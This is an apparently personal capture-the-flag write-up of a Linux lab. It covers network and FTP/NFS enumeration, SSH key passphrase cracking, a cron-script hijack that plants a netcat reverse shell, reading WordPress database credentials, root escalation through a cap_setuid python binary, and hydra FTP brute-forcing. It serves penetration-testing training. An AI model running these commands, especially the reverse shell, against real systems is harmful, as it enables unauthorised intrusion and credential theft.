Scenario
This is the Capstone Challenge for Ryan’s Hacking Linux course on Simply Cyber Academy. As a result, this lab isn’t strictly focused on realism, but rather teaching proper enumeration, lateral movement, and privilege escalation on a Linux machine.
There are 6 flags on the machine (you can see the location of each by clicking the ‘hint’ button to make it less of a rabbit chase). There are also multiple ways to solve the machine… so if you solve it in one way, you can go back and see if you can find the 2nd way.
Happy hacking!
Network Enumeration
sudo nmap -p- --min-rate 1500 --max-rtt-timeout 500ms --max-retries 3 --open -T4 -Pn -v -oN quick_tcp_scan 10.1.125.115
PORT STATE SERVICE
21/tcp open ftp
22/tcp open ssh
80/tcp open http
111/tcp open rpcbind
2049/tcp open nfs
35997/tcp open unknown
36071/tcp open unknown
36605/tcp open unknown
43297/tcp open unknown
50889/tcp open unknownsudo nmap -p 21,22,80,111,2049,35997,36071,36605,43297,50889 -A -oN detailed_scan -oX detailed_scan.xml 10.1.125.115
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 3.0.5
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_-rw-r--r-- 1 0 0 202 Sep 21 00:04 pwlist.txt
| ftp-syst:
| STAT:
| FTP server status:
| Connected to 10.0.0.247
| Logged in as ftp
| TYPE: ASCII
| No session bandwidth limit
| Session timeout in seconds is 300
| Control connection is plain text
| Data connections will be plain text
| At session startup, client count was 2
| vsFTPd 3.0.5 - secure, fast, stable
|_End of status
22/tcp open ssh OpenSSH 9.6p1 Ubuntu 3ubuntu13.14 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 256 30:79:bf:62:52:65:f6:f2:cb:41:67:58:c2:8c:24:c9 (ECDSA)
|_ 256 c4:06:e2:d0:6c:82:d8:13:12:70:5d:89:20:dd:36:82 (ED25519)
80/tcp open http Apache httpd 2.4.58 ((Ubuntu))
|_http-server-header: Apache/2.4.58 (Ubuntu)
|_http-title: Apache2 Ubuntu Default Page: It works
111/tcp open rpcbind 2-4 (RPC #100000)
| rpcinfo:
| program version port/proto service
| 100000 2,3,4 111/tcp rpcbind
| 100000 2,3,4 111/udp rpcbind
| 100000 3,4 111/tcp6 rpcbind
| 100000 3,4 111/udp6 rpcbind
| 100003 3,4 2049/tcp nfs
| 100003 3,4 2049/tcp6 nfs
| 100005 1,2,3 42410/udp mountd
| 100005 1,2,3 50619/tcp6 mountd
| 100005 1,2,3 50889/tcp mountd
| 100005 1,2,3 58288/udp6 mountd
| 100021 1,3,4 33763/tcp6 nlockmgr
| 100021 1,3,4 35997/tcp nlockmgr
| 100021 1,3,4 40002/udp nlockmgr
| 100021 1,3,4 41008/udp6 nlockmgr
| 100024 1 36605/tcp status
| 100024 1 49205/udp6 status
| 100024 1 57463/tcp6 status
| 100024 1 60118/udp status
| 100227 3 2049/tcp nfs_acl
|_ 100227 3 2049/tcp6 nfs_acl
2049/tcp open nfs_acl 3 (RPC #100227)
35997/tcp open nlockmgr 1-4 (RPC #100021)
36071/tcp open mountd 1-3 (RPC #100005)
36605/tcp open status 1 (RPC #100024)
43297/tcp open mountd 1-3 (RPC #100005)
50889/tcp open mountd 1-3 (RPC #100005)sudo nmap -sU -p 53,161,123 --min-rate 100 -oN udp_scan 10.1.125.115
PORT STATE SERVICE
53/udp closed domain
123/udp closed ntp
161/udp closed snmpFTP Enumeration (Port 21)
ftp anonymous@10.1.125.115 21
Connected to 10.1.125.115.
220 (vsFTPd 3.0.5)
331 Please specify the password.
Password:
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls
229 Entering Extended Passive Mode (|||23283|)
150 Here comes the directory listing.
-rw-r--r-- 1 0 0 202 Sep 21 00:04 pwlist.txt
226 Directory send OK.pwlist.txt contains what seems like passwords but there are empty lines between each value. Let’s use awk to consolidate the passwords it might be handy for future.
awk 'NF' pwlist.txt
password1
123456
letmein
qwerty
password
secret
ftp123
admin
passw0rd
iloveyou
welcome
monkey
dragon
shadow
baseball
football
abc123
trustno1
sunshine
princessNFS Enumeration (Port 111 & 2049)
showmount -e 10.1.125.115
Export list for 10.1.125.115:
/srv/nfs/user1 *sudo mkdir /mnt/nfs
sudo mount -t nfs 10.1.125.115:/srv/nfs/user1 /mnt/nfs
ls -la /mnt/nfs
total 16
drwxr-xr-x 2 1001 1001 4096 Sep 21 13:31 .
drwxr-xr-x 3 root root 4096 Nov 9 05:35 ..
-rw-r--r-- 1 1001 1001 2655 Sep 21 13:31 id_rsa
-rw-r--r-- 1 1001 1001 574 Sep 21 13:31 id_rsa.pubWe are able to mount the user1 share and retrieve a SSH key for user1
Web Enumeration (Port 80)
Directory Enumeration
ffuf -u http://10.1.125.115/FUZZ -w /usr/share/seclists/Discovery/Web-Content/raft-medium-directories.txt -c
/'___\ /'___\ /'___\
/\ \__/ /\ \__/ __ __ /\ \__/
\ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\
\ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/
\ \_\ \ \_\ \ \____/ \ \_\
\/_/ \/_/ \/___/ \/_/
v2.1.0-dev
________________________________________________
:: Method : GET
:: URL : http://10.1.125.115/FUZZ
:: Wordlist : FUZZ: /usr/share/seclists/Discovery/Web-Content/raft-medium-directories.txt
:: Follow redirects : false
:: Calibration : false
:: Timeout : 10
:: Threads : 40
:: Matcher : Response status: 200-299,301,302,307,401,403,405,500
________________________________________________
wp-admin [Status: 301, Size: 315, Words: 20, Lines: 10, Duration: 248ms]
wp-includes [Status: 301, Size: 318, Words: 20, Lines: 10, Duration: 250ms]
wp-content [Status: 301, Size: 317, Words: 20, Lines: 10, Duration: 250ms]
server-status [Status: 403, Size: 277, Words: 20, Lines: 10, Duration: 245ms]
:: Progress: [29999/29999] :: Job [1/1] :: 163 req/sec :: Duration: [0:03:16] :: Errors: 1 ::Web file enumeration
ffuf -u http://10.1.125.115/FUZZ -w /usr/share/seclists/Discovery/Web-Content/raft-medium-files.txt -c -fc 403,500
/'___\ /'___\ /'___\
/\ \__/ /\ \__/ __ __ /\ \__/
\ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\
\ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/
\ \_\ \ \_\ \ \____/ \ \_\
\/_/ \/_/ \/___/ \/_/
v2.1.0-dev
________________________________________________
:: Method : GET
:: URL : http://10.1.125.115/FUZZ
:: Wordlist : FUZZ: /usr/share/seclists/Discovery/Web-Content/raft-medium-files.txt
:: Follow redirects : false
:: Calibration : false
:: Timeout : 10
:: Threads : 40
:: Matcher : Response status: 200-299,301,302,307,401,403,405,500
:: Filter : Response status: 403,500
________________________________________________
index.html [Status: 200, Size: 10671, Words: 3496, Lines: 364, Duration: 245ms]
readme.html [Status: 200, Size: 7425, Words: 752, Lines: 99, Duration: 244ms]
license.txt [Status: 200, Size: 19903, Words: 3331, Lines: 385, Duration: 244ms]
wp-config.php [Status: 200, Size: 4, Words: 1, Lines: 5, Duration: 244ms]
. [Status: 200, Size: 10671, Words: 3496, Lines: 364, Duration: 247ms]
wp-load.php [Status: 200, Size: 4, Words: 1, Lines: 5, Duration: 249ms]
:: Progress: [17129/17129] :: Job [1/1] :: 162 req/sec :: Duration: [0:01:47] :: Errors: 0 ::
The webserver seems to be hosting a WordPress site, but we are unable to access any of the login pages.
Foothold
ssh user1@10.1.125.115 -i id_rsa
The authenticity of host '10.1.125.115 (10.1.125.115)' can't be established.
ED25519 key fingerprint is SHA256:d63zLEoy1MDYDElorZ+sa58UKFRFW39jODBGLKL2tHs.
This key is not known by any other names.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '10.1.125.115' (ED25519) to the list of known hosts.
Enter passphrase for key 'id_rsa': A passphrase is required for the SSH key.
ssh2john id_rsa > key.hash
john --wordlist=/usr/share/wordlists/rockyou.txt key.hash --force
Using default input encoding: UTF-8
Loaded 1 password hash (SSH, SSH private key [RSA/DSA/EC/OPENSSH 32/64])
Cost 1 (KDF/cipher [0=MD5/AES 1=MD5/3DES 2=Bcrypt/AES]) is 2 for all loaded hashes
Cost 2 (iteration count) is 24 for all loaded hashes
Will run 3 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
sxxxxxx (id_rsa)
1g 0:00:03:23 DONE (2025-11-09 05:53) 0.004903g/s 25.18p/s 25.18c/s 25.18C/s jodie..flaca
Use the "--show" option to display all of the cracked passwords reliably
Session completed. user1@ip-10-1-125-115:/opt/user1$ ls -la
total 12
drwx------ 2 user1 root 4096 Sep 19 16:16 .
drwxr-xr-x 7 root root 4096 Sep 19 16:16 ..
-rw------- 1 user1 root 45 Sep 21 00:04 flag1Flag1 can be obtained in the /opt/user1 directory.
Cron
timeout 3m ./pspy64 -pf -i 1000
2025/11/10 11:51:01 FS: ACCESS | /usr/lib/x86_64-linux-gnu/ld-linux-x86-64.so.2
2025/11/10 11:51:01 FS: OPEN | /etc/ld.so.cache
2025/11/10 11:51:01 FS: OPEN | /usr/lib/x86_64-linux-gnu/libc.so.6
2025/11/10 11:51:01 FS: ACCESS | /usr/lib/x86_64-linux-gnu/libc.so.6
2025/11/10 11:51:01 CMD: UID=1002 PID=27765 | /bin/sh -c /tmp/backup.sh
2025/11/10 11:51:01 CMD: UID=0 PID=27766 | /usr/sbin/CRON -f -P
2025/11/10 11:51:01 FS: CLOSE_NOWRITE | /etc/ld.so.cache
2025/11/10 11:51:01 FS: OPEN | /etc/group
2025/11/10 11:51:01 FS: ACCESS | /etc/groupuser1@ip-10-1-125-115:/tmp$ ls -la
total 56
drwxrwxrwt 14 root root 4096 Nov 10 11:49 .
drwxr-xr-x 22 root root 4096 Nov 10 11:19 ..
drwxrwxrwt 2 root root 4096 Nov 10 11:19 .ICE-unix
drwxrwxrwt 2 root root 4096 Nov 10 11:19 .X11-unix
drwxrwxrwt 2 root root 4096 Nov 10 11:19 .XIM-unix
drwxrwxrwt 2 root root 4096 Nov 10 11:19 .font-unix
drwx------ 2 root root 4096 Nov 10 11:19 snap-private-tmp
drwx------ 3 root root 4096 Nov 10 11:19 systemd-private-c19f3c855ecb4636b2e8bd09deb3cb3f-ModemManager.service-EbHOp9
drwx------ 3 root root 4096 Nov 10 11:19 systemd-private-c19f3c855ecb4636b2e8bd09deb3cb3f-apache2.service-OtpCCb
drwx------ 3 root root 4096 Nov 10 11:19 systemd-private-c19f3c855ecb4636b2e8bd09deb3cb3f-chrony.service-69gxG1
drwx------ 3 root root 4096 Nov 10 11:19 systemd-private-c19f3c855ecb4636b2e8bd09deb3cb3f-polkit.service-W313qG
drwx------ 3 root root 4096 Nov 10 11:19 systemd-private-c19f3c855ecb4636b2e8bd09deb3cb3f-systemd-logind.service-D56nRj
drwx------ 3 root root 4096 Nov 10 11:19 systemd-private-c19f3c855ecb4636b2e8bd09deb3cb3f-systemd-resolved.service-5CFyLp
drwx------ 2 user1 user1 4096 Nov 10 11:38 tmux-1001user1@ip-10-1-125-115:/tmp$ echo 'busybox nc 10.200.19.99 80 -e /bin/sh' > backup.sh
user1@ip-10-1-125-115:/tmp$ chmod +x backup.shUser2
user2@ip-10-1-125-115:~$ whoami
user2
user2@ip-10-1-125-115:~$ id
uid=1002(user2) gid=1002(user2) groups=1002(user2)Viewing the sockets connections we can see a localhost connection for mysql (port 3306).
user2@ip-10-1-125-115:/var/www/html$ ss -tln
State Recv-Q Send-Q Local Address:Port Peer Address:Port Process
LISTEN 0 4096 0.0.0.0:111 0.0.0.0:*
LISTEN 0 4096 0.0.0.0:60483 0.0.0.0:*
LISTEN 0 64 0.0.0.0:2049 0.0.0.0:*
LISTEN 0 4096 0.0.0.0:22 0.0.0.0:*
LISTEN 0 32 0.0.0.0:21 0.0.0.0:*
LISTEN 0 4096 0.0.0.0:53611 0.0.0.0:*
LISTEN 0 4096 0.0.0.0:59813 0.0.0.0:*
LISTEN 0 64 0.0.0.0:38281 0.0.0.0:*
LISTEN 0 4096 127.0.0.53%lo:53 0.0.0.0:*
LISTEN 0 4096 0.0.0.0:53885 0.0.0.0:*
LISTEN 0 70 127.0.0.1:33060 0.0.0.0:*
LISTEN 0 4096 127.0.0.54:53 0.0.0.0:*
LISTEN 0 151 127.0.0.1:3306 0.0.0.0:*
LISTEN 0 4096 [::]:32879 [::]:*
LISTEN 0 4096 [::]:111 [::]:*
LISTEN 0 4096 [::]:40003 [::]:*
LISTEN 0 511 *:80 *:*
LISTEN 0 64 [::]:2049 [::]:*
LISTEN 0 4096 [::]:22 [::]:*
LISTEN 0 4096 [::]:56801 [::]:*
LISTEN 0 4096 [::]:39383 [::]:*
LISTEN 0 64 [::]:45751 [::]:* We can find some database credentials in the WordPress wp-config.php file.
user2@ip-10-1-125-115:/var/www/html$ cat wp-config.php
<?php
define('DB_NAME', 'wordpress');
define('DB_USER', 'wpuser');
define('DB_PASSWORD', 'wppassword');
define('DB_HOST', 'localhost');
?>With these credentials we can gain access to the database and retrieve user3’s password.
user2@ip-10-1-125-115:/var/www/html$ mysql -u wpuser -D wordpress -h localhost -p
Enter password:
Reading table information for completion of table and column names
You can turn off this feature to get a quicker startup with -A
Welcome to the MySQL monitor. Commands end with ; or \g.
Your MySQL connection id is 16
Server version: 8.0.43-0ubuntu0.24.04.2 (Ubuntu)
Copyright (c) 2000, 2025, Oracle and/or its affiliates.
Oracle is a registered trademark of Oracle Corporation and/or its
affiliates. Other names may be trademarks of their respective
owners.
Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.
mysql> mysql> show databases;
+--------------------+
| Database |
+--------------------+
| information_schema |
| performance_schema |
| wordpress |
+--------------------+
3 rows in set (0.00 sec)
mysql> use wordpress;
Database changed
mysql> show tables;
+---------------------+
| Tables_in_wordpress |
+---------------------+
| flags |
| users |
+---------------------+
2 rows in set (0.00 sec)
mysql> DESC users;
+----------+-------------+------+-----+---------+----------------+
| Field | Type | Null | Key | Default | Extra |
+----------+-------------+------+-----+---------+----------------+
| id | int | NO | PRI | NULL | auto_increment |
| username | varchar(50) | YES | | NULL | |
| password | varchar(50) | YES | | NULL | |
+----------+-------------+------+-----+---------+----------------+
3 rows in set (0.01 sec)
mysql> SELECT username,password FROM wordpress.users;
+----------+---------------+
| username | password |
+----------+---------------+
| user3 | usxxxxxxx|
+----------+---------------+
1 row in set (0.00 sec)
We can also get the 4th flag from this database.
User3
There is random python binary in the home folder which we can use capabilities to privilege escalate.
user3@ip-10-1-125-115:~$ find . -type f -exec getcap {} \;
./python3 cap_setuid=epuser3@ip-10-1-125-115:~$ ./python3 -c 'import os; os.setuid(0); os.system("/bin/bash")'
root@ip-10-1-125-115:~# id
uid=0(root) gid=1003(user3) groups=1003(user3)
root@ip-10-1-125-115:~# whoami
root
root@ip-10-1-125-115:~#
With the root user we are able to get the final flag.
Ftpuser
To find the password for the ftpuser, we can use the pwlist found in ftp and bruteforce the account.
hydra -l ftpuser -P pwlist.txt ftp://10.1.125.115
Hydra v9.5 (c) 2023 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).
Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2025-11-10 06:27:00
[DATA] max 16 tasks per 1 server, overall 16 tasks, 21 login tries (l:1/p:21), ~2 tries per task
[DATA] attacking ftp://10.1.125.115:21/
[21][ftp] host: 10.1.125.115 login: ftpuser password: sxxxxx
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2025-11-10 06:27:04user1@ip-10-1-125-115:/var/www/html$ cd /home
user1@ip-10-1-125-115:/home$ su ftpuser
Password:
ftpuser@ip-10-1-125-115:/home$ whoami
ftpuser
Persecure : my learning archive 